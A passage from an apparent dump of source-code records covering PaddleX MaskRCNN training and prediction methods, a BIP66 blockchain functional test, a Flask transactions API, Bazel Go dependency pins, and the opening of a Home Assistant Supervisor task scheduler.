'COCO'\n else:\n raise Exception(\n \"train_dataset should be datasets.COCODetection or datasets.EasyDataDet.\"\n )\n assert metric in ['COCO', 'VOC'], \"Metric only support 'VOC' or 'COCO'\"\n self.metric = metric\n if not self.trainable:\n raise Exception(\"Model is not trainable from load_model method.\")\n self.labels = copy.deepcopy(train_dataset.labels)\n self.labels.insert(0, 'background')\n # 构建训练网络\n if optimizer is None:\n # 构建默认的优化策略\n num_steps_each_epoch = train_dataset.num_samples 
// train_batch_size\n optimizer = self.default_optimizer(\n learning_rate=learning_rate,\n warmup_steps=warmup_steps,\n warmup_start_lr=warmup_start_lr,\n lr_decay_epochs=lr_decay_epochs,\n lr_decay_gamma=lr_decay_gamma,\n num_steps_each_epoch=num_steps_each_epoch)\n self.optimizer = optimizer\n # 构建训练、验证、测试网络\n self.build_program()\n fuse_bn = True\n if self.with_fpn and self.backbone in [\n 'ResNet18', 'ResNet50', 'HRNet_W18'\n ]:\n fuse_bn = False\n self.net_initialize(\n startup_prog=fluid.default_startup_program(),\n pretrain_weights=pretrain_weights,\n fuse_bn=fuse_bn,\n save_dir=save_dir,\n resume_checkpoint=resume_checkpoint)\n # 训练\n self.train_loop(\n num_epochs=num_epochs,\n train_dataset=train_dataset,\n train_batch_size=train_batch_size,\n eval_dataset=eval_dataset,\n save_interval_epochs=save_interval_epochs,\n log_interval_steps=log_interval_steps,\n save_dir=save_dir,\n use_vdl=use_vdl,\n early_stop=early_stop,\n early_stop_patience=early_stop_patience)\n\n def evaluate(self,\n eval_dataset,\n batch_size=1,\n epoch_id=None,\n metric=None,\n return_details=False):\n \"\"\"评估。\n\n Args:\n eval_dataset (paddlex.datasets): 验证数据读取器。\n batch_size (int): 验证数据批大小。默认为1。当前只支持设置为1。\n epoch_id (int): 当前评估模型所在的训练轮数。\n metric (bool): 训练过程中评估的方式,取值范围为['COCO', 'VOC']。默认为None,\n 根据用户传入的Dataset自动选择,如为VOCDetection,则metric为'VOC';\n 如为COCODetection,则metric为'COCO'。\n return_details (bool): 是否返回详细信息。默认值为False。\n\n Returns:\n tuple (metrics, eval_details) /dict (metrics): 当return_details为True时,返回(metrics, eval_details),\n 当return_details为False时,返回metrics。metrics为dict,包含关键字:'bbox_mmap'和'segm_mmap'\n 或者’bbox_map‘和'segm_map',分别表示预测框和分割区域平均准确率平均值在\n 各个IoU阈值下的结果取平均值的结果(mmAP)、平均准确率平均值(mAP)。eval_details为dict,\n 包含bbox、mask和gt三个关键字。其中关键字bbox的键值是一个列表,列表中每个元素代表一个预测结果,\n 一个预测结果是一个由图像id,预测框类别id, 预测框坐标,预测框得分组成的列表。\n 关键字mask的键值是一个列表,列表中每个元素代表各预测框内物体的分割结果,分割结果由图像id、\n 预测框类别id、表示预测框内各像素点是否属于物体的二值图、预测框得分。\n 而关键字gt的键值是真实标注框的相关信息。\n \"\"\"\n input_channel = getattr(self, 'input_channel', 3)\n arrange_transforms(\n model_type=self.model_type,\n class_name=self.__class__.__name__,\n transforms=eval_dataset.transforms,\n mode='eval',\n input_channel=input_channel)\n if metric is None:\n if hasattr(self, 'metric') and self.metric is not None:\n metric = self.metric\n else:\n if isinstance(eval_dataset, paddlex.datasets.CocoDetection):\n metric = 'COCO'\n else:\n raise Exception(\n \"eval_dataset should be datasets.COCODetection.\")\n assert metric in ['COCO', 'VOC'], \"Metric only support 'VOC' or 'COCO'\"\n if batch_size > 1:\n batch_size = 1\n logging.warning(\n \"Mask RCNN supports batch_size=1 only during evaluating, so batch_size is forced to be set to 1.\"\n )\n data_generator = eval_dataset.generator(\n batch_size=batch_size, drop_last=False)\n\n total_steps = math.ceil(eval_dataset.num_samples * 1.0 / batch_size)\n results = list()\n logging.info(\n \"Start to evaluating(total_samples={}, total_steps={})...\".format(\n eval_dataset.num_samples, total_steps))\n for step, data in tqdm.tqdm(\n enumerate(data_generator()), total=total_steps):\n images = np.array([d[0] for d in data]).astype('float32')\n im_infos = np.array([d[1] for d in data]).astype('float32')\n im_shapes = np.array([d[3] for d in data]).astype('float32')\n feed_data = {\n 'image': images,\n 'im_info': im_infos,\n 'im_shape': im_shapes,\n }\n with fluid.scope_guard(self.scope):\n outputs = self.exe.run(\n self.test_prog,\n feed=[feed_data],\n fetch_list=list(self.test_outputs.values()),\n return_numpy=False)\n res = {\n 'bbox': 
(np.array(outputs[0]),\n outputs[0].recursive_sequence_lengths()),\n 'mask': (np.array(outputs[1]),\n outputs[1].recursive_sequence_lengths())\n }\n res_im_id = [d[2] for d in data]\n res['im_info'] = (im_infos, [])\n res['im_shape'] = (im_shapes, [])\n res['im_id'] = (np.array(res_im_id), [])\n results.append(res)\n logging.debug(\"[EVAL] Epoch={}, Step={}/{}\".format(epoch_id, step +\n 1, total_steps))\n\n ap_stats, eval_details = eval_results(\n results,\n 'COCO',\n eval_dataset.coco_gt,\n with_background=True,\n resolution=self.mask_head_resolution)\n if metric == 'VOC':\n if isinstance(ap_stats[0], np.ndarray) and isinstance(ap_stats[1],\n np.ndarray):\n metrics = OrderedDict(\n zip(['bbox_map', 'segm_map'],\n [ap_stats[0][1], ap_stats[1][1]]))\n else:\n metrics = OrderedDict(\n zip(['bbox_map', 'segm_map'], [0.0, 0.0]))\n elif metric == 'COCO':\n if isinstance(ap_stats[0], np.ndarray) and isinstance(ap_stats[1],\n np.ndarray):\n metrics = OrderedDict(\n zip(['bbox_mmap', 'segm_mmap'],\n [ap_stats[0][0], ap_stats[1][0]]))\n else:\n metrics = OrderedDict(\n zip(['bbox_mmap', 'segm_mmap'], [0.0, 0.0]))\n if return_details:\n return metrics, eval_details\n return metrics\n\n @staticmethod\n def _postprocess(res, batch_size, num_classes, mask_head_resolution,\n labels):\n clsid2catid = dict({i: i for i in range(num_classes)})\n xywh_results = bbox2out([res], clsid2catid)\n segm_results = mask2out([res], clsid2catid, mask_head_resolution)\n preds = [[] for i in range(batch_size)]\n import pycocotools.mask as mask_util\n for index, xywh_res in enumerate(xywh_results):\n image_id = xywh_res['image_id']\n del xywh_res['image_id']\n xywh_res['mask'] = mask_util.decode(segm_results[index][\n 'segmentation'])\n xywh_res['category'] = labels[xywh_res['category_id']]\n preds[image_id].append(xywh_res)\n\n return preds\n\n def predict(self, img_file, transforms=None):\n \"\"\"预测。\n\n Args:\n img_file(str|np.ndarray): 预测图像路径,或者是解码后的排列格式为(H, W, C)且类型为float32且为BGR格式的数组。\n transforms (paddlex.det.transforms): 数据预处理操作。\n\n Returns:\n lict: 预测结果列表,每个预测结果由预测框类别标签、预测框类别名称、\n 预测框坐标(坐标格式为[xmin, ymin, w, h])、\n 原图大小的预测二值图(1表示预测框类别,0表示背景类)、\n 预测框得分组成。\n \"\"\"\n if transforms is None and not hasattr(self, 'test_transforms'):\n raise Exception(\"transforms need to be defined, now is None.\")\n if isinstance(img_file, (str, np.ndarray)):\n images = [img_file]\n else:\n raise Exception(\"img_file must be str/np.ndarray\")\n\n if transforms is None:\n transforms = self.test_transforms\n input_channel = getattr(self, 'input_channel', 3)\n im, im_resize_info, im_shape = FasterRCNN._preprocess(\n images,\n transforms,\n self.model_type,\n self.__class__.__name__,\n input_channel=input_channel)\n\n with fluid.scope_guard(self.scope):\n result = self.exe.run(self.test_prog,\n feed={\n 'image': im,\n 'im_info': im_resize_info,\n 'im_shape': im_shape\n },\n fetch_list=list(self.test_outputs.values()),\n return_numpy=False,\n use_program_cache=True)\n\n res = {\n k: (np.array(v), v.recursive_sequence_lengths())\n for k, v in zip(list(self.test_outputs.keys()), result)\n }\n res['im_id'] = (np.array(\n [[i] for i in range(len(images))]).astype('int32'), [])\n res['im_shape'] = (np.array(im_shape), [])\n preds = MaskRCNN._postprocess(res,\n len(images), self.num_classes,\n self.mask_head_resolution, self.labels)\n\n return preds[0]\n\n def batch_predict(self, img_file_list, transforms=None):\n \"\"\"预测。\n\n Args:\n img_file_list(list|tuple): 对列表(或元组)中的图像同时进行预测,列表中的元素可以是图像路径\n 也可以是解码后的排列格式为(H,W,C)且类型为float32且为BGR格式的数组。\n 
transforms (paddlex.det.transforms): 数据预处理操作。\n Returns:\n dict: 每个元素都为列表,表示各图像的预测结果。在各图像的预测结果列表中,每个预测结果由预测框类别标签、预测框类别名称、\n 预测框坐标(坐标格式为[xmin, ymin, w, h])、\n 原图大小的预测二值图(1表示预测框类别,0表示背景类)、\n 预测框得分组成。\n \"\"\"\n if transforms is None and not hasattr(self, 'test_transforms'):\n raise Exception(\"transforms need to be defined, now is None.\")\n\n if not isinstance(img_file_list, (list, tuple)):\n raise Exception(\"im_file must be list/tuple\")\n\n if transforms is None:\n transforms = self.test_transforms\n input_channel = getattr(self, 'input_channel', 3)\n im, im_resize_info, im_shape = FasterRCNN._preprocess(\n img_file_list,\n transforms,\n self.model_type,\n self.__class__.__name__,\n self.thread_pool,\n input_channel=input_channel)\n\n with fluid.scope_guard(self.scope):\n result = self.exe.run(self.test_prog,\n feed={\n 'image': im,\n 'im_info': im_resize_info,\n 'im_shape': im_shape\n },\n fetch_list=list(self.test_outputs.values()),\n return_numpy=False,\n use_program_cache=True)\n\n res = {\n k: (np.array(v), v.recursive_sequence_lengths())\n for k, v in zip(list(self.test_outputs.keys()), result)\n }\n res['im_id'] = (np.array(\n [[i] for i in range(len(img_file_list))]).astype('int32'), [])\n res['im_shape'] = (np.array(im_shape), [])\n preds = MaskRCNN._postprocess(res,\n len(img_file_list), self.num_classes,\n self.mask_head_resolution, self.labels)\n return preds\n"} {"ext": "py", "sha": "1a2eacc2f3916b6075bdbfc43d13fe6c53275fcf", "content": "#!/usr/bin/env python3\n# Copyright (c) 2014-2016 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Test the BIP66 changeover logic.\"\"\"\n\nfrom test_framework.test_framework import eBitcashTestFramework\nfrom test_framework.util import *\n\nclass BIP66Test(eBitcashTestFramework):\n def __init__(self):\n super().__init__()\n self.num_nodes = 3\n self.setup_clean_chain = False\n self.extra_args = [[], [\"-blockversion=2\"], [\"-blockversion=3\"]]\n\n def setup_network(self):\n self.setup_nodes()\n connect_nodes(self.nodes[1], 0)\n connect_nodes(self.nodes[2], 0)\n self.sync_all()\n\n def run_test(self):\n cnt = self.nodes[0].getblockcount()\n\n # Mine some old-version blocks\n self.nodes[1].generate(100)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 100):\n raise AssertionError(\"Failed to mine 100 version=2 blocks\")\n\n # Mine 750 new-version blocks\n for i in range(15):\n self.nodes[2].generate(50)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 850):\n raise AssertionError(\"Failed to mine 750 version=3 blocks\")\n\n # TODO: check that new DERSIG rules are not enforced\n\n # Mine 1 new-version block\n self.nodes[2].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 851):\n raise AssertionError(\"Failed to mine a version=3 blocks\")\n\n # TODO: check that new DERSIG rules are enforced\n\n # Mine 198 new-version blocks\n for i in range(2):\n self.nodes[2].generate(99)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1049):\n raise AssertionError(\"Failed to mine 198 version=3 blocks\")\n\n # Mine 1 old-version block\n self.nodes[1].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1050):\n raise AssertionError(\"Failed to mine a version=2 block after 949 version=3 blocks\")\n\n # Mine 1 new-version blocks\n self.nodes[2].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1051):\n raise 
AssertionError(\"Failed to mine a version=3 block\")\n\n # Mine 1 old-version blocks. This should fail\n assert_raises_jsonrpc(-1, \"CreateNewBlock: TestBlockValidity failed: bad-version(0x00000002)\", self.nodes[1].generate, 1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1051):\n raise AssertionError(\"Accepted a version=2 block after 950 version=3 blocks\")\n\n # Mine 1 new-version blocks\n self.nodes[2].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1052):\n raise AssertionError(\"Failed to mine a version=3 block\")\n\nif __name__ == '__main__':\n BIP66Test().main()\n"} {"ext": "py", "sha": "1a2eace8ec481648fbd359e34435c38d92ba172b", "content": "import sqlite3\nimport json\nimport math\nfrom sqlite3.dbapi2 import Error\n\nfrom flask import Flask, request, Response, render_template\n\napp = Flask(__name__)\n\n\ndef open_db():\n db = sqlite3.connect('./transactions.db')\n db.row_factory = sqlite3.Row\n return db\n\n\n@app.route('/', methods=['GET'])\ndef transactions():\n return render_template('transactions.html')\n\n\n@app.route('/categories', methods=['GET'])\ndef categories():\n return render_template('categories.html')\n\n\n@app.route('/api/transactions', methods=['GET'])\ndef get_transactions():\n with open_db() as db:\n results = db.execute('SELECT * FROM transactions WHERE date >= \"2021-05-01\" ORDER BY date ASC')\n return Response(json.dumps([dict(idx) for idx in results.fetchall()]), mimetype='application/json')\n\n\n@app.route('/api/transactions/', methods=['PUT', 'PATCH'])\ndef update_transaction(id):\n transaction = request.get_json(force=True)\n with open_db() as db:\n db.execute('UPDATE transactions SET category_id = ? WHERE id = ?', (transaction['category_id'], id))\n db.commit()\n return {'success': True}\n\n\n@app.route('/api/categories', methods=['GET'])\ndef get_categories():\n with open_db() as db:\n results = db.execute('SELECT * FROM categories')\n return Response(json.dumps([dict(idx) for idx in results.fetchall()]), mimetype='application/json')\n\n\n@app.route('/api/categories', methods=['POST'])\ndef create_category():\n category = request.get_json(force=True)\n with open_db() as db:\n db.execute('INSERT INTO categories (name) VALUES (?)', (category.get('name'),))\n db.commit()\n return {'success': True}\n\n\n@app.route('/api/breakdown', methods=['GET'])\ndef get_breakdown():\n group_by_first = request.args.get('group_by', 'month').lower()\n\n with open_db() as db:\n results = db.execute('''\n SELECT\n j.*\n FROM (\n SELECT\n t.id,\n t.date,\n SUBSTR(t.date, 0, 8) as month,\n t.amount,\n REPLACE(t.description, ' ', ' ') as description,\n t.category_id,\n c.name as category_name,\n t.source\n FROM transactions t\n INNER JOIN categories c on t.category_id = c.id\n WHERE c.name NOT IN ('Income', 'Payments', 'Savings') AND t.date >= '2021-05'\n ) j\n ORDER BY j.month ASC, j.category_name ASC\n ''')\n # return Response(json.dumps([dict(idx) for idx in results.fetchall()], indent=2), mimetype='application/json')\n transactions = [dict(idx) for idx in results.fetchall()]\n\n if group_by_first == 'month':\n first_group = 'month'\n second_group = 'category_name'\n elif group_by_first == 'category':\n first_group = 'category_name'\n second_group = 'month'\n else:\n return Response(Error('Invalid group by'))\n\n aggregated_transactions = {}\n\n for item in transactions:\n item['description'] = item['description'].replace(' ', ' ', 10).replace('\\t', ' ')\n\n top_group_value = item.get(first_group)\n second_group_value = 
item.get(second_group)\n if top_group_value in aggregated_transactions.keys():\n if second_group_value in aggregated_transactions[top_group_value].keys():\n sub_group = aggregated_transactions[top_group_value][second_group_value]\n sub_group['transactions'].append(item)\n sub_group['summary']['amount'] += item['amount']\n sub_group['summary']['total_transactions'] += 1\n sub_group['summary']['min'] = min(sub_group['summary']['min'], item['amount'])\n sub_group['summary']['max'] = max(sub_group['summary']['max'], item['amount'])\n sub_group['summary']['avg'] = round(sub_group['summary']['amount'] / sub_group['summary']['total_transactions'], 2)\n else:\n aggregated_transactions[top_group_value][second_group_value] = {\n 'summary': {\n 'amount': item['amount'],\n 'total_transactions': 1,\n 'min': item['amount'],\n 'max': item['amount'],\n 'avg': item['amount']\n },\n 'transactions': [item]\n }\n else:\n aggregated_transactions[top_group_value] = {}\n aggregated_transactions[top_group_value][second_group_value] = {\n 'summary': {\n 'amount': item['amount'],\n 'total_transactions': 1,\n 'min': item['amount'],\n 'max': item['amount'],\n 'avg': item['amount']\n },\n 'transactions': [item]\n }\n\n \n return Response(json.dumps(aggregated_transactions, indent=2), mimetype='application/json')\n"} {"ext": "bzl", "sha": "1a2eae09591d2dbe03c23e4a65058c61e49d5754", "content": "load(\"@bazel_gazelle//:deps.bzl\", \"go_repository\")\n\ndef go_repositories():\n go_repository(\n name = \"co_honnef_go_tools\",\n importpath = \"honnef.co/go/tools\",\n sum = \"h1:/hemPrYIhOhy8zYrNj+069zDB68us2sMGsfkFJO0iZs=\",\n version = \"v0.0.0-20190523083050-ea95bdfd59fc\",\n )\n go_repository(\n name = \"com_github_burntsushi_toml\",\n importpath = \"github.com/BurntSushi/toml\",\n sum = \"h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=\",\n version = \"v0.3.1\",\n )\n go_repository(\n name = \"com_github_census_instrumentation_opencensus_proto\",\n importpath = \"github.com/census-instrumentation/opencensus-proto\",\n sum = \"h1:glEXhBS5PSLLv4IXzLA5yPRVX4bilULVyxxbrfOtDAk=\",\n version = \"v0.2.1\",\n )\n go_repository(\n name = \"com_github_client9_misspell\",\n importpath = \"github.com/client9/misspell\",\n sum = \"h1:ta993UF76GwbvJcIo3Y68y/M3WxlpEHPWIGDkJYwzJI=\",\n version = \"v0.3.4\",\n )\n go_repository(\n name = \"com_github_cncf_udpa_go\",\n importpath = \"github.com/cncf/udpa/go\",\n sum = \"h1:WBZRG4aNOuI15bLRrCgN8fCq8E5Xuty6jGbmSNEvSsU=\",\n version = \"v0.0.0-20191209042840-269d4d468f6f\",\n )\n go_repository(\n name = \"com_github_davecgh_go_spew\",\n importpath = \"github.com/davecgh/go-spew\",\n sum = \"h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=\",\n version = \"v1.1.0\",\n )\n go_repository(\n name = \"com_github_envoyproxy_go_control_plane\",\n importpath = \"github.com/envoyproxy/go-control-plane\",\n sum = \"h1:rEvIZUSZ3fx39WIi3JkQqQBitGwpELBIYWeBVh6wn+E=\",\n version = \"v0.9.4\",\n )\n go_repository(\n name = \"com_github_envoyproxy_protoc_gen_validate\",\n importpath = \"github.com/envoyproxy/protoc-gen-validate\",\n sum = \"h1:EQciDnbrYxy13PgWoY8AqoxGiPrpgBZ1R8UNe3ddc+A=\",\n version = \"v0.1.0\",\n )\n go_repository(\n name = \"com_github_golang_glog\",\n importpath = \"github.com/golang/glog\",\n sum = \"h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=\",\n version = \"v0.0.0-20160126235308-23def4e6c14b\",\n )\n go_repository(\n name = \"com_github_golang_mock\",\n importpath = \"github.com/golang/mock\",\n sum = \"h1:G5FRp8JnTd7RQH5kemVNlMeyXQAztQ3mOWV95KxsXH8=\",\n version = 
\"v1.1.1\",\n )\n go_repository(\n name = \"com_github_golang_protobuf\",\n importpath = \"github.com/golang/protobuf\",\n sum = \"h1:F768QJ1E9tib+q5Sc8MkdJi1RxLTbRcTf8LJV56aRls=\",\n version = \"v1.3.5\",\n )\n go_repository(\n name = \"com_github_google_go_cmp\",\n importpath = \"github.com/google/go-cmp\",\n sum = \"h1:+dTQ8DZQJz0Mb/HjFlkptS1FeQ4cWSnN941F8aEG4SQ=\",\n version = \"v0.2.0\",\n )\n go_repository(\n name = \"com_github_labstack_echo\",\n importpath = \"github.com/labstack/echo\",\n sum = \"h1:pGRcYk231ExFAyoAjAfD85kQzRJCRI8bbnE7CX5OEgg=\",\n version = \"v3.3.10+incompatible\",\n )\n go_repository(\n name = \"com_github_labstack_gommon\",\n importpath = \"github.com/labstack/gommon\",\n sum = \"h1:JEeO0bvc78PKdyHxloTKiF8BD5iGrH8T6MSeGvSgob0=\",\n version = \"v0.3.0\",\n )\n go_repository(\n name = \"com_github_mattn_go_colorable\",\n importpath = \"github.com/mattn/go-colorable\",\n sum = \"h1:/bC9yWikZXAL9uJdulbSfyVNIR3n3trXl+v8+1sx8mU=\",\n version = \"v0.1.2\",\n )\n go_repository(\n name = \"com_github_mattn_go_isatty\",\n importpath = \"github.com/mattn/go-isatty\",\n sum = \"h1:d5US/mDsogSGW37IV293h//ZFaeajb69h+EHFsv2xGg=\",\n version = \"v0.0.9\",\n )\n go_repository(\n name = \"com_github_pmezard_go_difflib\",\n importpath = \"github.com/pmezard/go-difflib\",\n sum = \"h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=\",\n version = \"v1.0.0\",\n )\n go_repository(\n name = \"com_github_prometheus_client_model\",\n importpath = \"github.com/prometheus/client_model\",\n sum = \"h1:gQz4mCbXsO+nc9n1hCxHcGA3Zx3Eo+UHZoInFGUIXNM=\",\n version = \"v0.0.0-20190812154241-14fe0d1b01d4\",\n )\n go_repository(\n name = \"com_github_stretchr_objx\",\n importpath = \"github.com/stretchr/objx\",\n sum = \"h1:4G4v2dO3VZwixGIRoQ5Lfboy6nUhCyYzaqnIAPPhYs4=\",\n version = \"v0.1.0\",\n )\n go_repository(\n name = \"com_github_stretchr_testify\",\n importpath = \"github.com/stretchr/testify\",\n sum = \"h1:nOGnQDM7FYENwehXlg/kFVnos3rEvtKTjRvOWSzb6H4=\",\n version = \"v1.5.1\",\n )\n go_repository(\n name = \"com_github_valyala_bytebufferpool\",\n importpath = \"github.com/valyala/bytebufferpool\",\n sum = \"h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw=\",\n version = \"v1.0.0\",\n )\n go_repository(\n name = \"com_github_valyala_fasttemplate\",\n importpath = \"github.com/valyala/fasttemplate\",\n sum = \"h1:tY9CJiPnMXf1ERmG2EyK7gNUd+c6RKGD0IfU8WdUSz8=\",\n version = \"v1.0.1\",\n )\n go_repository(\n name = \"com_google_cloud_go\",\n importpath = \"cloud.google.com/go\",\n sum = \"h1:e0WKqKTd5BnrG8aKH3J3h+QvEIQtSUcf2n5UZ5ZgLtQ=\",\n version = \"v0.26.0\",\n )\n go_repository(\n name = \"in_gopkg_check_v1\",\n importpath = \"gopkg.in/check.v1\",\n sum = \"h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=\",\n version = \"v0.0.0-20161208181325-20d25e280405\",\n )\n go_repository(\n name = \"in_gopkg_yaml_v2\",\n importpath = \"gopkg.in/yaml.v2\",\n sum = \"h1:ZCJp+EgiOT7lHqUV2J862kp8Qj64Jo6az82+3Td9dZw=\",\n version = \"v2.2.2\",\n )\n go_repository(\n name = \"org_golang_google_appengine\",\n importpath = \"google.golang.org/appengine\",\n sum = \"h1:/wp5JvzpHIxhs/dumFmF7BXTf3Z+dd4uXta4kVyO508=\",\n version = \"v1.4.0\",\n )\n go_repository(\n name = \"org_golang_google_genproto\",\n importpath = \"google.golang.org/genproto\",\n sum = \"h1:gSJIx1SDwno+2ElGhA4+qG2zF97qiUzTM+rQ0klBOcE=\",\n version = \"v0.0.0-20190819201941-24fa4b261c55\",\n )\n go_repository(\n name = \"org_golang_google_grpc\",\n importpath = \"google.golang.org/grpc\",\n sum = 
\"h1:bO/TA4OxCOummhSf10siHuG7vJOiwh7SpRpFZDkOgl4=\",\n version = \"v1.28.0\",\n )\n go_repository(\n name = \"org_golang_x_crypto\",\n importpath = \"golang.org/x/crypto\",\n sum = \"h1:VklqNMn3ovrHsnt90PveolxSbWFaJdECFbxSq0Mqo2M=\",\n version = \"v0.0.0-20190308221718-c2843e01d9a2\",\n )\n go_repository(\n name = \"org_golang_x_exp\",\n importpath = \"golang.org/x/exp\",\n sum = \"h1:c2HOrn5iMezYjSlGPncknSEr/8x5LELb/ilJbXi9DEA=\",\n version = \"v0.0.0-20190121172915-509febef88a4\",\n )\n go_repository(\n name = \"org_golang_x_lint\",\n importpath = \"golang.org/x/lint\",\n sum = \"h1:XQyxROzUlZH+WIQwySDgnISgOivlhjIEwaQaJEJrrN0=\",\n version = \"v0.0.0-20190313153728-d0100b6bd8b3\",\n )\n go_repository(\n name = \"org_golang_x_net\",\n importpath = \"golang.org/x/net\",\n sum = \"h1:oWX7TPOiFAMXLq8o0ikBYfCJVlRHBcsciT5bXOrH628=\",\n version = \"v0.0.0-20190311183353-d8887717615a\",\n )\n go_repository(\n name = \"org_golang_x_oauth2\",\n importpath = \"golang.org/x/oauth2\",\n sum = \"h1:vEDujvNQGv4jgYKudGeI/+DAX4Jffq6hpD55MmoEvKs=\",\n version = \"v0.0.0-20180821212333-d2e6202438be\",\n )\n go_repository(\n name = \"org_golang_x_sync\",\n importpath = \"golang.org/x/sync\",\n sum = \"h1:8gQV6CLnAEikrhgkHFbMAEhagSSnXWGV915qUMm9mrU=\",\n version = \"v0.0.0-20190423024810-112230192c58\",\n )\n go_repository(\n name = \"org_golang_x_sys\",\n importpath = \"golang.org/x/sys\",\n sum = \"h1:aYOabOQFp6Vj6W1F80affTUvO9UxmJRx8K0gsfABByQ=\",\n version = \"v0.0.0-20190813064441-fde4db37ae7a\",\n )\n go_repository(\n name = \"org_golang_x_text\",\n importpath = \"golang.org/x/text\",\n sum = \"h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg=\",\n version = \"v0.3.0\",\n )\n go_repository(\n name = \"org_golang_x_tools\",\n importpath = \"golang.org/x/tools\",\n sum = \"h1:5Beo0mZN8dRzgrMMkDp0jc8YXQKx9DiJ2k1dkvGsn5A=\",\n version = \"v0.0.0-20190524140312-2c0ae7006135\",\n )\n"} {"ext": "py", "sha": "1a2eae233953993f9be256fe74b5570407e68d01", "content": "\"\"\"A collection of tasks.\"\"\"\nimport logging\n\nfrom ..const import AddonState\nfrom ..coresys import CoreSysAttributes\nfrom ..exceptions import (\n AddonsError,\n AudioError,\n CliError,\n CoreDNSError,\n HomeAssistantError,\n MulticastError,\n ObserverError,\n)\nfrom ..host.const import HostFeature\nfrom ..jobs.decorator import Job, JobCondition\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\nHASS_WATCHDOG_API = \"HASS_WATCHDOG_API\"\n\nRUN_UPDATE_SUPERVISOR = 29100\nRUN_UPDATE_ADDONS = 57600\nRUN_UPDATE_CLI = 28100\nRUN_UPDATE_DNS = 30100\nRUN_UPDATE_AUDIO = 30200\nRUN_UPDATE_MULTICAST = 30300\nRUN_UPDATE_OBSERVER = 30400\n\nRUN_RELOAD_ADDONS = 10800\nRUN_RELOAD_BACKUPS = 72000\nRUN_RELOAD_HOST = 7600\nRUN_RELOAD_UPDATER = 7200\nRUN_RELOAD_INGRESS = 930\n\nRUN_WATCHDOG_HOMEASSISTANT_DOCKER = 15\nRUN_WATCHDOG_HOMEASSISTANT_API = 120\n\nRUN_WATCHDOG_DNS_DOCKER = 30\nRUN_WATCHDOG_AUDIO_DOCKER = 60\nRUN_WATCHDOG_CLI_DOCKER = 60\nRUN_WATCHDOG_OBSERVER_DOCKER = 60\nRUN_WATCHDOG_MULTICAST_DOCKER = 60\n\nRUN_WATCHDOG_ADDON_DOCKER = 30\nRUN_WATCHDOG_ADDON_APPLICATON = 120\nRUN_WATCHDOG_OBSERVER_APPLICATION = 180\n\nRUN_REFRESH_ADDON = 15\n\nRUN_CHECK_CONNECTIVITY = 30\n\n\nclass Tasks(CoreSysAttributes):\n \"\"\"Handle Tasks inside Supervisor.\"\"\"\n\n def __init__(self, coresys):\n \"\"\"Initialize Tasks.\"\"\"\n self.coresys = coresys\n self._cache = {}\n\n async def load(self):\n \"\"\"Add Tasks to scheduler.\"\"\"\n # Update\n self.sys_scheduler.register_task(self._update_addons, RUN_UPDATE_ADDONS)\n 
self.sys_scheduler.register_task(self._update_supervisor, RUN_UPDATE_SUPERVISOR)\n self.sys_scheduler.register_task(self._update_cli, RUN_UPDATE_CLI)\n self.sys_scheduler.register_task(self._update_dns, RUN_UPDATE_DNS)\n self.sys_scheduler.register_task(self._update_audio, RUN_UPDATE_AUDIO)\n self.sys_scheduler.register_task(self._update_multicast, RUN_UPDATE_MULTICAST)\n self.sys_scheduler.register_task(self._update_observer, RUN_UPDATE_OBSERVER)\n\n # Reload\n self.sys_scheduler.register_task(self.sys_store.reload, RUN_RELOAD_ADDONS)\n self.sys_scheduler.register_task(self.sys_updater.reload, RUN_RELOAD_UPDATER)\n self.sys_scheduler.register_task(self.sys_backups.reload, RUN_RELOAD_BACKUPS)\n self.sys_scheduler.register_task(self.sys_host.reload, RUN_RELOAD_HOST)\n self.sys_scheduler.register_task(self.sys_ingress.reload, RUN_RELOAD_INGRESS)\n\n # Watchdog\n self.sys_scheduler.register_task(\n self._watchdog_homeassistant_docker, RUN_WATCHDOG_HOMEASSISTANT_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_homeassistant_api, RUN_WATCHDOG_HOMEASSISTANT_API\n )\n self.sys_scheduler.register_task(\n self._watchdog_dns_docker, RUN_WATCHDOG_DNS_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_audio_docker, RUN_WATCHDOG_AUDIO_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_cli_docker, RUN_WATCHDOG_CLI_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_observer_docker, RUN_WATCHDOG_OBSERVER_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_observer_application, RUN_WATCHDOG_OBSERVER_APPLICATION\n )\n self.sys_scheduler.register_task(\n self._watchdog_multicast_docker, RUN_WATCHDOG_MULTICAST_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_addon_docker, RUN_WATCHDOG_ADDON_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_addon_application, RUN_WATCHDOG_ADDON_APPLICATON\n )\n\n # Refresh\n self.sys_scheduler.register_task(self._refresh_addon, RUN_REFRESH_ADDON)\n\n # Connectivity\n self.sys_scheduler.register_task(\n self._check_connectivity, RUN_CHECK_CONNECTIVITY\n )\n\n _LOGGER.info(\"All core tasks are scheduled\")\n\n @Job(\n conditions=[\n JobCondition.HEALTHY,\n JobCondition.FREE_SPACE,\n JobCondition.INTERNET_HOST,\n JobCondition.RUNNING,\n ]\n )\n async def 